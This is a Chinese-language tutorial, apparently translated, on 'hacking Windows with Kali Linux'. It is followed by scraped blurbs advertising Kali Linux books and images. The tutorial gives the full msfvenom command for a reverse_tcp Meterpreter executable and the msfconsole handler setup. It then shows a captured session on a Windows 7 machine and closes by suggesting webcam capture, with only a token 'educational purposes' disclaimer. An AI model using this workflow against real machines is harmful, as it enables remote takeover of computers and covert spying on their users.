摘要: Kali Linux 派生自 Debian Linux,主要用于渗透测试,拥有超过 300 个的预安装好的渗透测试工具。Metasploit 项目中 Metasploit 框架支持 Kali Linux 平台,Metasploit 是一个用于开发和执行安全利用代码security exploit的工具。
Kali Linux 派生自 Debian Linux,主要用于渗透测试,拥有超过 300 个的预安装好的渗透测试工具。Metasploit 项目中 Metasploit 框架支持 Kali Linux 平台,Metasploit 是一个用于开发和执行安全利用代码security exploit的工具。让我们来使用 Kali Linux 来攻破 Windows 吧。请注意,我写这篇文章只是出于教育目的哦——一切因此带来的后果和本文作者、译者无关。
源机器详情
Kali Linux
root@kali:/# uname -a
Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
root@kali:/#
用做攻击对象的目标机器:
Windows 7 Ultimate SP1
步骤 1:创建 Payload 程序
Payload 是一个类似于病毒或者木马的程序,可以运行在远程目标上 —— 为了黑掉那台机器。可以通过以下命令来创建 Payload(program.exe),以便能使用 Kali Linux 黑掉 Windows。
root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /root/program.exe
root@kali:/# ls -la /root/program.exe
-rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe
通过 ls 命令,我们可以确认 Payload 程序是否成功生成在指定的位置。
步骤 2:运行 mfsconsole 命令启动 msf 命令窗口
root@kali:# msfconsole
.,,. .
.\$$$$$L..,,==aaccaacc%#s$b. d8, d8P
d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p
d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'
d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
.a#$$$$$$"` 88b d8P 88b`?8888P'
,s$$$$$$$"` 888888P' 88n _.,,,ass;:
.a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
.a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________ ,&$$$$$$'_____
ll&&$$$$'
.;;lll&&&&'
...;;lllll&'
......;;;llll;;;....
` ......;;;;... . .
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.12.22-dev ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf >
步骤 3:进行漏洞利用的细节
4444 端口:你可以按照自己的想法来选择使用哪个端口
LHOST IP:表示 Kali Linux 机器的 IP,这里是 192.168.189.128。 使用如下命令来查看你的 Kali Linux 机器的 IP。
root@kali:/# ip r l
192.168.189.0/24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100
root@kali:/#
现在在 msf 命令窗口使用 use exploit/multi/handler 命令,如下:
msf > use exploit/multi/handler
msf exploit(handler) >
然后在接下来的命令窗口中使用命令 set payload windows/meterpreter/reverse_tcp:
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
现在使用 LHOST 和 LPORT 来设置本地 IP 和本地端口,如下:
msf exploit(handler) > set lhost 192.168.189.128
lhost => 192.168.189.128
msf exploit(handler) > set lport 4444
lport => 4444
最后使用 exploit 命令。
msf exploit(handler) > exploit
Started reverse TCP handler on 192.168.189.128:4444
Starting the payload handler...
现在你需要在 Windows 上运行 program.exe,一旦它在目标机器上执行,你就可以建立一个 meterpreter 会话。输入 sysinfo 就可以得到这台被黑掉的 Windows 机器的详情。
msf exploit(handler) > exploit
Started reverse TCP handler on 192.168.189.128:4444
Starting the payload handler...
Sending stage (957999 bytes) to 192.168.189.1
Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000
meterpreter > sysinfo
Computer : MANN-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : en_IN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32
一旦你得到了这些详细信息,就可以做更多的漏洞利用,或者通过 help 命令获取更多信息,以便列出你可以黑掉该系统的所有选项,比如 webcam_snap 命令获取网络摄像头,同样你还可以使用其他更多的可用选项。祝你入侵愉快!!!! ←_←
分享到:
相关推荐
Kali Linux 使用手册 Kali Linux 是基于 Debian 的 Linux 发行版,设计用于数字取证和渗透测试。Kali Linux 预装了许多渗透测试软件,这使得它成为渗透测试和数字取证的首选。下面是 Kali Linux 使用手册中的一些...
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
- **数字取证**:教授如何使用Kali Linux进行有效的数字取证分析,包括数据恢复、日志分析等。 - **自动化脚本**:了解如何编写自动化脚本来辅助渗透测试工作,提高工作效率。 #### 结论 《Kali Linux Revealed》...
《Kali Linux 2 Windows渗透测试》是一本专注于渗透测试的书籍,特别关注在Windows环境下使用Kali Linux进行安全测试。Kali Linux是一个以安全工作和渗透测试为主要功能的操作系统,由著名的安全专家Wolf Halton和Bo...
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
第1篇为Iinux安全渗透测试基础,介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限...
Windows7 下安装 Kali Linux 双系统 本文旨在指导小白用户如何在 Windows 7 操作系统下安装 Kali Linux 双系统,从而扫除初学者的障碍。下面是详细的安装步骤和知识点。 知识点一:安装准备 在安装 Kali Linux ...
Kali Linux Windows Penetration Testing 英文azw3 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载自网络,如有侵权,请联系上传者或csdn删除
Kali Linux VMware(kali-linux-2022.2-vmware-i386.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: Kali Linux VMware(kali-linux-2022.2-vmware-i386.part1.rar) ... ...
Kali Linux VMware(kali-linux-2022.2-vmware-i386.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: Kali Linux VMware(kali-linux-2022.2-vmware-i386.part1.rar) ... ...
2013.pdf Hacking with Kali - Practical Penetration Testing Techniques 2014.pdf Instant Kali Linux -2013.pdf Kali Linux Cookbook -2013.pdf Kali Linux Social Engineering -2013.pdf Kali Linux:Assuring ...
2013.pdf Hacking with Kali - Practical Penetration Testing Techniques 2014.pdf Instant Kali Linux -2013.pdf Kali Linux Cookbook -2013.pdf Kali Linux Social Engineering -2013.pdf Kali Linux:Assuring ...
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证和渗透测试。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
《web渗透测试:使用kali linux》是一本web 渗透测试实践指南,全面讲解如何使用kali linux 对web 应用进行渗透测试。两位安全领域的专家站在攻击者的角度,一步步介绍了渗透测试基本概念、kali linux 配置方式,带...
标题提到的"Kali壁纸",实际上指的是Kali Linux操作系统的官方壁纸,这些壁纸以其独特的设计风格和与安全相关的主题吸引着用户,即便是非Kali Linux使用者也会因为它们的美观性而将其用作Windows操作系统的桌面背景...
使用Kali Linux进行Web渗透测试不仅能够提升测试效率,还能让测试过程更加系统化。 ### Web渗透测试基础 在Web渗透测试过程中,测试者首先要对目标网站进行信息收集。信息收集包括但不限于网站域名信息、服务器...
kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali linux 工具kali ...
Web渗透测试使用KaliLinux,epub格式的电子书。Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。